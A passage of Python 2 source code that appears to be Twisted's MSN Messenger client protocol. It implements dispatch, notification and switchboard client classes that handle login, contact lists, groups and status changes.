params.split())\n\n def rawDataReceived(self, data):\n extra = \"\"\n self.currentMessage.readPos += len(data)\n diff = self.currentMessage.readPos - self.currentMessage.length\n if diff > 0:\n self.currentMessage.message += data[:-diff]\n extra = data[-diff:]\n elif diff == 0:\n self.currentMessage.message += data\n else:\n self.currentMessage += data\n return\n del self.currentMessage.readPos\n m = self.currentMessage\n self.currentMessage = None\n self.setLineMode(extra)\n if not self.checkMessage(m):\n return\n self.gotMessage(m)\n\n ### protocol command handlers - no need to override these.\n\n def handle_MSG(self, params):\n checkParamLen(len(params), 3, 'MSG')\n try:\n messageLen = int(params[2])\n except ValueError:\n raise MSNProtocolError, \"Invalid Parameter for MSG length argument\"\n self.currentMessage = MSNMessage(length=messageLen, userHandle=params[0], screenName=unquote(params[1]))\n\n def handle_UNKNOWN(self, cmd, params):\n \"\"\" implement me in subclasses if you want to handle unknown events \"\"\"\n log.msg(\"Received unknown command (%s), params: %s\" % (cmd, params))\n\n ### callbacks\n\n def gotMessage(self, message):\n \"\"\"\n called when we receive a message - override in notification\n and switchboard clients\n \"\"\"\n raise NotImplementedError\n\n def gotBadLine(self, line, why):\n \"\"\" called when a handler notifies me that this line is broken \"\"\"\n log.msg('Error in line: %s (%s)' % (line, why))\n\n def gotError(self, errorCode):\n \"\"\"\n called when the server sends an error which is not in\n response to a sent command (ie. it has no matching transaction ID)\n \"\"\"\n log.msg('Error %s' % (errorCodes[errorCode]))\n\n\n\nclass DispatchClient(MSNEventBase):\n \"\"\"\n This class provides support for clients connecting to the dispatch server\n @ivar userHandle: your user handle (passport) needed before connecting.\n \"\"\"\n\n # eventually this may become an attribute of the\n # factory.\n userHandle = \"\"\n\n def connectionMade(self):\n MSNEventBase.connectionMade(self)\n self.sendLine('VER %s %s' % (self._nextTransactionID(), MSN_PROTOCOL_VERSION))\n\n ### protocol command handlers ( there is no need to override these )\n\n def handle_VER(self, params):\n id = self._nextTransactionID()\n self.sendLine(\"CVR %s %s %s\" % (id, MSN_CVR_STR, self.userHandle))\n\n def handle_CVR(self, params):\n self.sendLine(\"USR %s TWN I %s\" % (self._nextTransactionID(), self.userHandle))\n\n def handle_XFR(self, params):\n if len(params) < 4:\n raise MSNProtocolError, \"Invalid number of parameters for XFR\"\n id, refType, addr = params[:3]\n # was addr a host:port pair?\n try:\n host, port = addr.split(':')\n except ValueError:\n host = addr\n port = MSN_PORT\n if refType == \"NS\":\n self.gotNotificationReferral(host, int(port))\n\n ### callbacks\n\n def gotNotificationReferral(self, host, port):\n \"\"\"\n called when we get a referral to the notification server.\n\n @param host: the notification server's hostname\n @param port: the port to connect to\n \"\"\"\n pass\n\n\nclass NotificationClient(MSNEventBase):\n \"\"\"\n This class provides support for clients connecting\n to the notification server.\n \"\"\"\n\n factory = None # sssh pychecker\n\n def __init__(self, currentID=0):\n MSNEventBase.__init__(self)\n self.currentID = currentID\n self._state = ['DISCONNECTED', {}]\n\n def _setState(self, state):\n self._state[0] = state\n\n def _getState(self):\n return self._state[0]\n\n def _getStateData(self, key):\n return self._state[1][key]\n\n def _setStateData(self, key, value):\n self._state[1][key] = value\n\n def _remStateData(self, *args):\n for key in args:\n del self._state[1][key]\n\n def connectionMade(self):\n MSNEventBase.connectionMade(self)\n self._setState('CONNECTED')\n self.sendLine(\"VER %s %s\" % (self._nextTransactionID(), MSN_PROTOCOL_VERSION))\n\n def connectionLost(self, reason):\n self._setState('DISCONNECTED')\n self._state[1] = {}\n MSNEventBase.connectionLost(self, reason)\n\n def checkMessage(self, message):\n \"\"\" hook used for detecting specific notification messages \"\"\"\n cTypes = [s.lstrip() for s in message.getHeader('Content-Type').split(';')]\n if 'text/x-msmsgsprofile' in cTypes:\n self.gotProfile(message)\n return 0\n return 1\n\n ### protocol command handlers - no need to override these\n\n def handle_VER(self, params):\n id = self._nextTransactionID()\n self.sendLine(\"CVR %s %s %s\" % (id, MSN_CVR_STR, self.factory.userHandle))\n\n def handle_CVR(self, params):\n self.sendLine(\"USR %s TWN I %s\" % (self._nextTransactionID(), self.factory.userHandle))\n\n def handle_USR(self, params):\n if len(params) != 4 and len(params) != 6:\n raise MSNProtocolError, \"Invalid Number of Parameters for USR\"\n\n mechanism = params[1]\n if mechanism == \"OK\":\n self.loggedIn(params[2], unquote(params[3]), int(params[4]))\n elif params[2].upper() == \"S\":\n # we need to obtain auth from a passport server\n f = self.factory\n d = execute(\n _login, f.userHandle, f.password, f.passportServer,\n authData=params[3])\n d.addCallback(self._passportLogin)\n d.addErrback(self._passportError)\n\n def _passportLogin(self, result):\n if result[0] == LOGIN_REDIRECT:\n d = _login(self.factory.userHandle, self.factory.password,\n result[1], cached=1, authData=result[2])\n d.addCallback(self._passportLogin)\n d.addErrback(self._passportError)\n elif result[0] == LOGIN_SUCCESS:\n self.sendLine(\"USR %s TWN S %s\" % (self._nextTransactionID(), result[1]))\n elif result[0] == LOGIN_FAILURE:\n self.loginFailure(result[1])\n\n\n def _passportError(self, failure):\n \"\"\"\n Handle a problem logging in via the Passport server, passing on the\n error as a string message to the C{loginFailure} callback.\n \"\"\"\n if failure.check(SSLRequired):\n failure = failure.getErrorMessage()\n self.loginFailure(\"Exception while authenticating: %s\" % failure)\n\n\n def handle_CHG(self, params):\n checkParamLen(len(params), 3, 'CHG')\n id = int(params[0])\n if not self._fireCallback(id, params[1]):\n self.statusChanged(params[1])\n\n def handle_ILN(self, params):\n checkParamLen(len(params), 5, 'ILN')\n self.gotContactStatus(params[1], params[2], unquote(params[3]))\n\n def handle_CHL(self, params):\n checkParamLen(len(params), 2, 'CHL')\n self.sendLine(\"QRY %s msmsgs@msnmsgr.com 32\" % self._nextTransactionID())\n self.transport.write(md5(params[1] + MSN_CHALLENGE_STR).hexdigest())\n\n def handle_QRY(self, params):\n pass\n\n def handle_NLN(self, params):\n checkParamLen(len(params), 4, 'NLN')\n self.contactStatusChanged(params[0], params[1], unquote(params[2]))\n\n def handle_FLN(self, params):\n checkParamLen(len(params), 1, 'FLN')\n self.contactOffline(params[0])\n\n def handle_LST(self, params):\n # support no longer exists for manually\n # requesting lists - why do I feel cleaner now?\n if self._getState() != 'SYNC':\n return\n contact = MSNContact(userHandle=params[0], screenName=unquote(params[1]),\n lists=int(params[2]))\n if contact.lists & FORWARD_LIST:\n contact.groups.extend(map(int, params[3].split(',')))\n self._getStateData('list').addContact(contact)\n self._setStateData('last_contact', contact)\n sofar = self._getStateData('lst_sofar') + 1\n if sofar == self._getStateData('lst_reply'):\n # this is the best place to determine that\n # a syn realy has finished - msn _may_ send\n # BPR information for the last contact\n # which is unfortunate because it means\n # that the real end of a syn is non-deterministic.\n # to handle this we'll keep 'last_contact' hanging\n # around in the state data and update it if we need\n # to later.\n self._setState('SESSION')\n contacts = self._getStateData('list')\n phone = self._getStateData('phone')\n id = self._getStateData('synid')\n self._remStateData('lst_reply', 'lsg_reply', 'lst_sofar', 'phone', 'synid', 'list')\n self._fireCallback(id, contacts, phone)\n else:\n self._setStateData('lst_sofar',sofar)\n\n def handle_BLP(self, params):\n # check to see if this is in response to a SYN\n if self._getState() == 'SYNC':\n self._getStateData('list').privacy = listCodeToID[params[0].lower()]\n else:\n id = int(params[0])\n self._fireCallback(id, int(params[1]), listCodeToID[params[2].lower()])\n\n def handle_GTC(self, params):\n # check to see if this is in response to a SYN\n if self._getState() == 'SYNC':\n if params[0].lower() == \"a\":\n self._getStateData('list').autoAdd = 0\n elif params[0].lower() == \"n\":\n self._getStateData('list').autoAdd = 1\n else:\n raise MSNProtocolError, \"Invalid Paramater for GTC\" # debug\n else:\n id = int(params[0])\n if params[1].lower() == \"a\":\n self._fireCallback(id, 0)\n elif params[1].lower() == \"n\":\n self._fireCallback(id, 1)\n else:\n raise MSNProtocolError, \"Invalid Paramater for GTC\" # debug\n\n def handle_SYN(self, params):\n id = int(params[0])\n if len(params) == 2:\n self._setState('SESSION')\n self._fireCallback(id, None, None)\n else:\n contacts = MSNContactList()\n contacts.version = int(params[1])\n self._setStateData('list', contacts)\n self._setStateData('lst_reply', int(params[2]))\n self._setStateData('lsg_reply', int(params[3]))\n self._setStateData('lst_sofar', 0)\n self._setStateData('phone', [])\n\n def handle_LSG(self, params):\n if self._getState() == 'SYNC':\n self._getStateData('list').groups[int(params[0])] = unquote(params[1])\n\n # Please see the comment above the requestListGroups / requestList methods\n # regarding support for this\n #\n #else:\n # self._getStateData('groups').append((int(params[4]), unquote(params[5])))\n # if params[3] == params[4]: # this was the last group\n # self._fireCallback(int(params[0]), self._getStateData('groups'), int(params[1]))\n # self._remStateData('groups')\n\n def handle_PRP(self, params):\n if self._getState() == 'SYNC':\n self._getStateData('phone').append((params[0], unquote(params[1])))\n else:\n self._fireCallback(int(params[0]), int(params[1]), unquote(params[3]))\n\n def handle_BPR(self, params):\n numParams = len(params)\n if numParams == 2: # part of a syn\n self._getStateData('last_contact').setPhone(params[0], unquote(params[1]))\n elif numParams == 4:\n self.gotPhoneNumber(int(params[0]), params[1], params[2], unquote(params[3]))\n\n def handle_ADG(self, params):\n checkParamLen(len(params), 5, 'ADG')\n id = int(params[0])\n if not self._fireCallback(id, int(params[1]), unquote(params[2]), int(params[3])):\n raise MSNProtocolError, \"ADG response does not match up to a request\" # debug\n\n def handle_RMG(self, params):\n checkParamLen(len(params), 3, 'RMG')\n id = int(params[0])\n if not self._fireCallback(id, int(params[1]), int(params[2])):\n raise MSNProtocolError, \"RMG response does not match up to a request\" # debug\n\n def handle_REG(self, params):\n checkParamLen(len(params), 5, 'REG')\n id = int(params[0])\n if not self._fireCallback(id, int(params[1]), int(params[2]), unquote(params[3])):\n raise MSNProtocolError, \"REG response does not match up to a request\" # debug\n\n def handle_ADD(self, params):\n numParams = len(params)\n if numParams < 5 or params[1].upper() not in ('AL','BL','RL','FL'):\n raise MSNProtocolError, \"Invalid Paramaters for ADD\" # debug\n id = int(params[0])\n listType = params[1].lower()\n listVer = int(params[2])\n userHandle = params[3]\n groupID = None\n if numParams == 6: # they sent a group id\n if params[1].upper() != \"FL\":\n raise MSNProtocolError, \"Only forward list can contain groups\" # debug\n groupID = int(params[5])\n if not self._fireCallback(id, listCodeToID[listType], userHandle, listVer, groupID):\n self.userAddedMe(userHandle, unquote(params[4]), listVer)\n\n def handle_REM(self, params):\n numParams = len(params)\n if numParams < 4 or params[1].upper() not in ('AL','BL','FL','RL'):\n raise MSNProtocolError, \"Invalid Paramaters for REM\" # debug\n id = int(params[0])\n listType = params[1].lower()\n listVer = int(params[2])\n userHandle = params[3]\n groupID = None\n if numParams == 5:\n if params[1] != \"FL\":\n raise MSNProtocolError, \"Only forward list can contain groups\" # debug\n groupID = int(params[4])\n if not self._fireCallback(id, listCodeToID[listType], userHandle, listVer, groupID):\n if listType.upper() == \"RL\":\n self.userRemovedMe(userHandle, listVer)\n\n def handle_REA(self, params):\n checkParamLen(len(params), 4, 'REA')\n id = int(params[0])\n self._fireCallback(id, int(params[1]), unquote(params[3]))\n\n def handle_XFR(self, params):\n checkParamLen(len(params), 5, 'XFR')\n id = int(params[0])\n # check to see if they sent a host/port pair\n try:\n host, port = params[2].split(':')\n except ValueError:\n host = params[2]\n port = MSN_PORT\n\n if not self._fireCallback(id, host, int(port), params[4]):\n raise MSNProtocolError, \"Got XFR (referral) that I didn't ask for .. should this happen?\" # debug\n\n def handle_RNG(self, params):\n checkParamLen(len(params), 6, 'RNG')\n # check for host:port pair\n try:\n host, port = params[1].split(\":\")\n port = int(port)\n except ValueError:\n host = params[1]\n port = MSN_PORT\n self.gotSwitchboardInvitation(int(params[0]), host, port, params[3], params[4],\n unquote(params[5]))\n\n def handle_OUT(self, params):\n checkParamLen(len(params), 1, 'OUT')\n if params[0] == \"OTH\":\n self.multipleLogin()\n elif params[0] == \"SSD\":\n self.serverGoingDown()\n else:\n raise MSNProtocolError, \"Invalid Parameters received for OUT\" # debug\n\n # callbacks\n\n def loggedIn(self, userHandle, screenName, verified):\n \"\"\"\n Called when the client has logged in.\n The default behaviour of this method is to\n update the factory with our screenName and\n to sync the contact list (factory.contacts).\n When this is complete self.listSynchronized\n will be called.\n\n @param userHandle: our userHandle\n @param screenName: our screenName\n @param verified: 1 if our passport has been (verified), 0 if not.\n (i'm not sure of the significace of this)\n @type verified: int\n \"\"\"\n self.factory.screenName = screenName\n if not self.factory.contacts:\n listVersion = 0\n else:\n listVersion = self.factory.contacts.version\n self.syncList(listVersion).addCallback(self.listSynchronized)\n\n\n def loginFailure(self, message):\n \"\"\"\n Called when the client fails to login.\n\n @param message: a message indicating the problem that was encountered\n \"\"\"\n\n\n def gotProfile(self, message):\n \"\"\"\n Called after logging in when the server sends an initial\n message with MSN/passport specific profile information\n such as country, number of kids, etc.\n Check the message headers for the specific values.\n\n @param message: The profile message\n \"\"\"\n pass\n\n def listSynchronized(self, *args):\n \"\"\"\n Lists are now synchronized by default upon logging in, this\n method is called after the synchronization has finished\n and the factory now has the up-to-date contacts.\n \"\"\"\n pass\n\n def statusChanged(self, statusCode):\n \"\"\"\n Called when our status changes and it isn't in response to\n a client command. By default we will update the status\n attribute of the factory.\n\n @param statusCode: 3-letter status code\n \"\"\"\n self.factory.status = statusCode\n\n def gotContactStatus(self, statusCode, userHandle, screenName):\n \"\"\"\n Called after loggin in when the server sends status of online contacts.\n By default we will update the status attribute of the contact stored\n on the factory.\n\n @param statusCode: 3-letter status code\n @param userHandle: the contact's user handle (passport)\n @param screenName: the contact's screen name\n \"\"\"\n self.factory.contacts.getContact(userHandle).status = statusCode\n\n def contactStatusChanged(self, statusCode, userHandle, screenName):\n \"\"\"\n Called when we're notified that a contact's status has changed.\n By default we will update the status attribute of the contact\n stored on the factory.\n\n @param statusCode: 3-letter status code\n @param userHandle: the contact's user handle (passport)\n @param screenName: the contact's screen name\n \"\"\"\n self.factory.contacts.getContact(userHandle).status = statusCode\n\n def contactOffline(self, userHandle):\n \"\"\"\n Called when a contact goes offline. By default this method\n will update the status attribute of the contact stored\n on the factory.\n\n @param userHandle: the contact's user handle\n \"\"\"\n self.factory.contacts.getContact(userHandle).status = STATUS_OFFLINE\n\n def gotPhoneNumber(self, listVersion, userHandle, phoneType, number):\n \"\"\"\n Called when the server sends us phone details about\n a specific user (for example after a user is added\n the server will send their status, phone details etc.\n By default we will update the list version for the\n factory's contact list and update the phone details\n for the specific user.\n\n @param listVersion: the new list version\n @param userHandle: the contact's user handle (passport)\n @param phoneType: the specific phoneType\n (*_PHONE constants or HAS_PAGER)\n @param number: the value/phone number.\n \"\"\"\n self.factory.contacts.version = listVersion\n self.factory.contacts.getContact(userHandle).setPhone(phoneType, number)\n\n def userAddedMe(self, userHandle, screenName, listVersion):\n \"\"\"\n Called when a user adds me to their list. (ie. they have been added to\n the reverse list. By default this method will update the version of\n the factory's contact list -- that is, if the contact already exists\n it will update the associated lists attribute, otherwise it will create\n a new MSNContact object and store it.\n\n @param userHandle: the userHandle of the user\n @param screenName: the screen name of the user\n @param listVersion: the new list version\n @type listVersion: int\n \"\"\"\n self.factory.contacts.version = listVersion\n c = self.factory.contacts.getContact(userHandle)\n if not c:\n c = MSNContact(userHandle=userHandle, screenName=screenName)\n self.factory.contacts.addContact(c)\n c.addToList(REVERSE_LIST)\n\n def userRemovedMe(self, userHandle, listVersion):\n \"\"\"\n Called when a user removes us from their contact list\n (they are no longer on our reverseContacts list.\n By default this method will update the version of\n the factory's contact list -- that is, the user will\n be removed from the reverse list and if they are no longer\n part of any lists they will be removed from the contact\n list entirely.\n\n @param userHandle: the contact's user handle (passport)\n @param listVersion: the new list version\n \"\"\"\n self.factory.contacts.version = listVersion\n c = self.factory.contacts.getContact(userHandle)\n c.removeFromList(REVERSE_LIST)\n if c.lists == 0:\n self.factory.contacts.remContact(c.userHandle)\n\n def gotSwitchboardInvitation(self, sessionID, host, port,\n key, userHandle, screenName):\n \"\"\"\n Called when we get an invitation to a switchboard server.\n This happens when a user requests a chat session with us.\n\n @param sessionID: session ID number, must be remembered for logging in\n @param host: the hostname of the switchboard server\n @param port: the port to connect to\n @param key: used for authorization when connecting\n @param userHandle: the user handle of the person who invited us\n @param screenName: the screen name of the person who invited us\n \"\"\"\n pass\n\n def multipleLogin(self):\n \"\"\"\n Called when the server says there has been another login\n under our account, the server should disconnect us right away.\n \"\"\"\n pass\n\n def serverGoingDown(self):\n \"\"\"\n Called when the server has notified us that it is going down for\n maintenance.\n \"\"\"\n pass\n\n # api calls\n\n def changeStatus(self, status):\n \"\"\"\n Change my current status. This method will add\n a default callback to the returned Deferred\n which will update the status attribute of the\n factory.\n\n @param status: 3-letter status code (as defined by\n the STATUS_* constants)\n @return: A Deferred, the callback of which will be\n fired when the server confirms the change\n of status. The callback argument will be\n a tuple with the new status code as the\n only element.\n \"\"\"\n\n id, d = self._createIDMapping()\n self.sendLine(\"CHG %s %s\" % (id, status))\n def _cb(r):\n self.factory.status = r[0]\n return r\n return d.addCallback(_cb)\n\n # I am no longer supporting the process of manually requesting\n # lists or list groups -- as far as I can see this has no use\n # if lists are synchronized and updated correctly, which they\n # should be. If someone has a specific justified need for this\n # then please contact me and i'll re-enable/fix support for it.\n\n #def requestList(self, listType):\n # \"\"\"\n # request the desired list type\n #\n # @param listType: (as defined by the *_LIST constants)\n # @return: A Deferred, the callback of which will be\n # fired when the list has been retrieved.\n # The callback argument will be a tuple with\n # the only element being a list of MSNContact\n # objects.\n # \"\"\"\n # # this doesn't need to ever be used if syncing of the lists takes place\n # # i.e. please don't use it!\n # warnings.warn(\"Please do not use this method - use the list syncing process instead\")\n # id, d = self._createIDMapping()\n # self.sendLine(\"LST %s %s\" % (id, listIDToCode[listType].upper()))\n # self._setStateData('list',[])\n # return d\n\n def setPrivacyMode(self, privLevel):\n \"\"\"\n Set my privacy mode on the server.\n\n B{Note}:\n This only keeps the current privacy setting on\n the server for later retrieval, it does not\n effect the way the server works at all.\n\n @param privLevel: This parameter can be true, in which\n case the server will keep the state as\n 'al' which the official client interprets\n as -> allow messages from only users on\n the allow list. Alternatively it can be\n false, in which case the server will keep\n the state as 'bl' which the official client\n interprets as -> allow messages from all\n users except those on the block list.\n\n @return: A Deferred, the callback of which will be fired when\n the server replies with the new privacy setting.\n The callback argument will be a tuple, the 2 elements\n of which being the list version and either 'al'\n or 'bl' (the new privacy setting).\n \"\"\"\n\n id, d = self._createIDMapping()\n if privLevel:\n self.sendLine(\"BLP %s AL\" % id)\n else:\n self.sendLine(\"BLP %s BL\" % id)\n return d\n\n def syncList(self, version):\n \"\"\"\n Used for keeping an up-to-date contact list.\n A callback is added to the returned Deferred\n that updates the contact list on the factory\n and also sets my state to STATUS_ONLINE.\n\n B{Note}:\n This is called automatically upon signing\n in using the version attribute of\n factory.contacts, so you may want to persist\n this object accordingly. Because of this there\n is no real need to ever call this method\n directly.\n\n @param version: The current known list version\n\n @return: A Deferred, the callback of which will be\n fired when the server sends an adequate reply.\n The callback argument will be a tuple with two\n elements, the new list (MSNContactList) and\n your current state (a dictionary). If the version\n you sent _was_ the latest list version, both elements\n will be None. To just request the list send a version of 0.\n \"\"\"\n\n self._setState('SYNC')\n id, d = self._createIDMapping(data=str(version))\n self._setStateData('synid',id)\n self.sendLine(\"SYN %s %s\" % (id, version))\n def _cb(r):\n self.changeStatus(STATUS_ONLINE)\n if r[0] is not None:\n self.factory.contacts = r[0]\n return r\n return d.addCallback(_cb)\n\n\n # I am no longer supporting the process of manually requesting\n # lists or list groups -- as far as I can see this has no use\n # if lists are synchronized and updated correctly, which they\n # should be. If someone has a specific justified need for this\n # then please contact me and i'll re-enable/fix support for it.\n\n #def requestListGroups(self):\n # \"\"\"\n # Request (forward) list groups.\n #\n # @return: A Deferred, the callback for which will be called\n # when the server responds with the list groups.\n # The callback argument will be a tuple with two elements,\n # a dictionary mapping group IDs to group names and the\n # current list version.\n # \"\"\"\n #\n # # this doesn't need to be used if syncing of the lists takes place (which it SHOULD!)\n # # i.e. please don't use it!\n # warnings.warn(\"Please do not use this method - use the list syncing process instead\")\n # id, d = self._createIDMapping()\n # self.sendLine(\"LSG %s\" % id)\n # self._setStateData('groups',{})\n # return d\n\n def setPhoneDetails(self, phoneType, value):\n \"\"\"\n Set/change my phone numbers stored on the server.\n\n @param phoneType: phoneType can be one of the following\n constants - HOME_PHONE, WORK_PHONE,\n MOBILE_PHONE, HAS_PAGER.\n These are pretty self-explanatory, except\n maybe HAS_PAGER which refers to whether or\n not you have a pager.\n @param value: for all of the *_PHONE constants the value is a\n phone number (str), for HAS_PAGER accepted values\n are 'Y' (for yes) and 'N' (for no).\n\n @return: A Deferred, the callback for which will be fired when\n the server confirms the change has been made. The\n callback argument will be a tuple with 2 elements, the\n first being the new list version (int) and the second\n being the new phone number value (str).\n \"\"\"\n # XXX: Add a default callback which updates\n # factory.contacts.version and the relevant phone\n # number\n id, d = self._createIDMapping()\n self.sendLine(\"PRP %s %s %s\" % (id, phoneType, quote(value)))\n return d\n\n def addListGroup(self, name):\n \"\"\"\n Used to create a new list group.\n A default callback is added to the\n returned Deferred which updates the\n contacts attribute of the factory.\n\n @param name: The desired name of the new group.\n\n @return: A Deferred, the callbacck for which will be called\n when the server clarifies that the new group has been\n created. The callback argument will be a tuple with 3\n elements: the new list version (int), the new group name\n (str) and the new group ID (int).\n \"\"\"\n\n id, d = self._createIDMapping()\n self.sendLine(\"ADG %s %s 0\" % (id, quote(name)))\n def _cb(r):\n self.factory.contacts.version = r[0]\n self.factory.contacts.setGroup(r[1], r[2])\n return r\n return d.addCallback(_cb)\n\n def remListGroup(self, groupID):\n \"\"\"\n Used to remove a list group.\n A default callback is added to the\n returned Deferred which updates the\n contacts attribute of the factory.\n\n @param groupID: the ID of the desired group to be removed.\n\n @return: A Deferred, the callback for which will be called when\n the server clarifies the deletion of the group.\n The callback argument will be a tuple with 2 elements:\n the new list version (int) and the group ID (int) of\n the removed group.\n \"\"\"\n\n id, d = self._createIDMapping()\n self.sendLine(\"RMG %s %s\" % (id, groupID))\n def _cb(r):\n self.factory.contacts.version = r[0]\n self.factory.contacts.remGroup(r[1])\n return r\n return d.addCallback(_cb)\n\n def renameListGroup(self, groupID, newName):\n \"\"\"\n Used to rename an existing list group.\n A default callback is added to the returned\n Deferred which updates the contacts attribute\n of the factory.\n\n @param groupID: the ID of the desired group to rename.\n @param newName: the desired new name for the group.\n\n @return: A Deferred, the callback for which will be called\n when the server clarifies the renaming.\n The callback argument will be a tuple of 3 elements,\n the new list version (int), the group id (int) and\n the new group name (str).\n \"\"\"\n\n id, d = self._createIDMapping()\n self.sendLine(\"REG %s %s %s 0\" % (id, groupID, quote(newName)))\n def _cb(r):\n self.factory.contacts.version = r[0]\n self.factory.contacts.setGroup(r[1], r[2])\n return r\n return d.addCallback(_cb)\n\n def addContact(self, listType, userHandle, groupID=0):\n \"\"\"\n Used to add a contact to the desired list.\n A default callback is added to the returned\n Deferred which updates the contacts attribute of\n the factory with the new contact information.\n If you are adding a contact to the forward list\n and you want to associate this contact with multiple\n groups then you will need to call this method for each\n group you would like to add them to, changing the groupID\n parameter. The default callback will take care of updating\n the group information on the factory's contact list.\n\n @param listType: (as defined by the *_LIST constants)\n @param userHandle: the user handle (passport) of the contact\n that is being added\n @param groupID: the group ID for which to associate this contact\n with. (default 0 - default group). Groups are only\n valid for FORWARD_LIST.\n\n @return: A Deferred, the callback for which will be called when\n the server has clarified that the user has been added.\n The callback argument will be a tuple with 4 elements:\n the list type, the contact's user handle, the new list\n version, and the group id (if relevant, otherwise it\n will be None)\n \"\"\"\n\n id, d = self._createIDMapping()\n listType = listIDToCode[listType].upper()\n if listType == \"FL\":\n self.sendLine(\"ADD %s FL %s %s %s\" % (id, userHandle, userHandle, groupID))\n else:\n self.sendLine(\"ADD %s %s %s %s\" % (id, listType, userHandle, userHandle))\n\n def _cb(r):\n self.factory.contacts.version = r[2]\n c = self.factory.contacts.getContact(r[1])\n if not c:\n c = MSNContact(userHandle=r[1])\n if r[3]:\n c.groups.append(r[3])\n c.addToList(r[0])\n return r\n return d.addCallback(_cb)\n\n def remContact(self, listType, userHandle, groupID=0):\n \"\"\"\n Used to remove a contact from the desired list.\n A default callback is added to the returned deferred\n which updates the contacts attribute of the factory\n to reflect the new contact information. If you are\n removing from the forward list then you will need to\n supply a groupID, if the contact is in more than one\n group then they will only be removed from this group\n and not the entire forward list, but if this is their\n only group they will be removed from the whole list.\n\n @param listType: (as defined by the *_LIST constants)\n @param userHandle: the user handle (passport) of the\n contact being removed\n @param groupID: the ID of the group to which this contact\n belongs (only relevant for FORWARD_LIST,\n default is 0)\n\n @return: A Deferred, the callback for which will be called when\n the server has clarified that the user has been removed.\n The callback argument will be a tuple of 4 elements:\n the list type, the contact's user handle, the new list\n version, and the group id (if relevant, otherwise it will\n be None)\n \"\"\"\n\n id, d = self._createIDMapping()\n listType = listIDToCode[listType].upper()\n if listType == \"FL\":\n self.sendLine(\"REM %s FL %s %s\" % (id, userHandle, groupID))\n else:\n self.sendLine(\"REM %s %s %s\" % (id, listType, userHandle))\n\n def _cb(r):\n l = self.factory.contacts\n l.version = r[2]\n c = l.getContact(r[1])\n group = r[3]\n shouldRemove = 1\n if group: # they may not have been removed from the list\n c.groups.remove(group)\n if c.groups:\n shouldRemove = 0\n if shouldRemove:\n c.removeFromList(r[0])\n if c.lists == 0:\n l.remContact(c.userHandle)\n return r\n return d.addCallback(_cb)\n\n def changeScreenName(self, newName):\n \"\"\"\n Used to change your current screen name.\n A default callback is added to the returned\n Deferred which updates the screenName attribute\n of the factory and also updates the contact list\n version.\n\n @param newName: the new screen name\n\n @return: A Deferred, the callback for which will be called\n when the server sends an adequate reply.\n The callback argument will be a tuple of 2 elements:\n the new list version and the new screen name.\n \"\"\"\n\n id, d = self._createIDMapping()\n self.sendLine(\"REA %s %s %s\" % (id, self.factory.userHandle, quote(newName)))\n def _cb(r):\n self.factory.contacts.version = r[0]\n self.factory.screenName = r[1]\n return r\n return d.addCallback(_cb)\n\n def requestSwitchboardServer(self):\n \"\"\"\n Used to request a switchboard server to use for conversations.\n\n @return: A Deferred, the callback for which will be called when\n the server responds with the switchboard information.\n The callback argument will be a tuple with 3 elements:\n the host of the switchboard server, the port and a key\n used for logging in.\n \"\"\"\n\n id, d = self._createIDMapping()\n self.sendLine(\"XFR %s SB\" % id)\n return d\n\n def logOut(self):\n \"\"\"\n Used to log out of the notification server.\n After running the method the server is expected\n to close the connection.\n \"\"\"\n\n self.sendLine(\"OUT\")\n\nclass NotificationFactory(ClientFactory):\n \"\"\"\n Factory for the NotificationClient protocol.\n This is basically responsible for keeping\n the state of the client and thus should be used\n in a 1:1 situation with clients.\n\n @ivar contacts: An MSNContactList instance reflecting\n the current contact list -- this is\n generally kept up to date by the default\n command handlers.\n @ivar userHandle: The client's userHandle, this is expected\n to be set by the client and is used by the\n protocol (for logging in etc).\n @ivar screenName: The client's current screen-name -- this is\n generally kept up to date by the default\n command handlers.\n @ivar password: The client's password -- this is (obviously)\n expected to be set by the client.\n @ivar passportServer: This must point to an msn passport server\n (the whole URL is required)\n @ivar status: The status of the client -- this is generally kept\n up to date by the default command handlers\n \"\"\"\n\n contacts = None\n userHandle = ''\n screenName = ''\n password = ''\n passportServer = 'https://nexus.passport.com/rdr/pprdr.asp'\n status = 'FLN'\n protocol = NotificationClient\n\n\n# XXX: A lot of the state currently kept in\n# instances of SwitchboardClient is likely to\n# be moved into a factory at some stage in the\n# future\n\nclass SwitchboardClient(MSNEventBase):\n \"\"\"\n This class provides support for clients connecting to a switchboard server.\n\n Switchboard servers are used for conversations with other people\n on the MSN network. This means that the number of conversations at\n any given time will be directly proportional to the number of\n connections to varioius switchboard servers.\n\n MSN makes no distinction between single and group conversations,\n so any number of users may be invited to join a specific conversation\n taking place on a switchboard server.\n\n @ivar key: authorization key, obtained when receiving\n invitation / requesting switchboard server.\n @ivar userHandle: your user handle (passport)\n @ivar sessionID: unique session ID, used if you are replying\n to a switchboard invitation\n @ivar reply: set this to 1 in connectionMade or before to signifiy\n that you are replying to a switchboard invitation.\n \"\"\"\n\n key = 0\n userHandle = \"\"\n sessionID = \"\"\n reply = 0\n\n _iCookie = 0\n\n def __init__(self):\n MSNEventBase.__init__(self)\n self.pendingUsers = {}\n self.cookies = {'iCookies' : {}, 'external' : {}} # will maybe be moved to a factory in the future\n\n def connectionMade(self):\n MSNEventBase.connectionMade(self)\n print 'sending initial stuff'\n self._sendInit()\n\n def connectionLost(self, reason):\n self.cookies['iCookies'] = {}\n self.cookies['external'] = {}\n MSNEventBase.connectionLost(self, reason)\n\n def _sendInit(self):\n \"\"\"\n send initial data based on whether we are replying to an invitation\n or starting one.\n \"\"\"\n id = self._nextTransactionID()\n if not self.reply:\n self.sendLine(\"USR %s %s %s\" % (id, self.userHandle, self.key))\n else:\n self.sendLine(\"ANS %s %s %s %s\" % (id, self.userHandle, self.key, self.sessionID))\n\n def _newInvitationCookie(self):\n self._iCookie += 1\n if self._iCookie > 1000:\n self._iCookie = 1\n return self._iCookie\n\n def _checkTyping(self, message, cTypes):\n \"\"\" helper method for checkMessage \"\"\"\n if 'text/x-msmsgscontrol' in cTypes and message.hasHeader('TypingUser'):\n self.userTyping(message)\n return 1\n\n def _checkFileInvitation(self, message, info):\n \"\"\" helper method for checkMessage \"\"\"\n guid = info.get('Application-GUID', '').lower()\n name = info.get('Application-Name', '').lower()\n\n # Both fields are required, but we'll let some lazy clients get away\n # with only sending a name, if it is easy for us to recognize the\n # name (the name is localized, so this check might fail for lazy,\n # non-english clients, but I'm not about to include \"file transfer\"\n # in 80 different languages here).\n\n if name != \"file transfer\" and guid != classNameToGUID[\"file transfer\"]:\n return 0\n try:\n cookie = int(info['Invitation-Cookie'])\n fileName = info['Application-File']\n fileSize = int(info['Application-FileSize'])\n except KeyError:\n 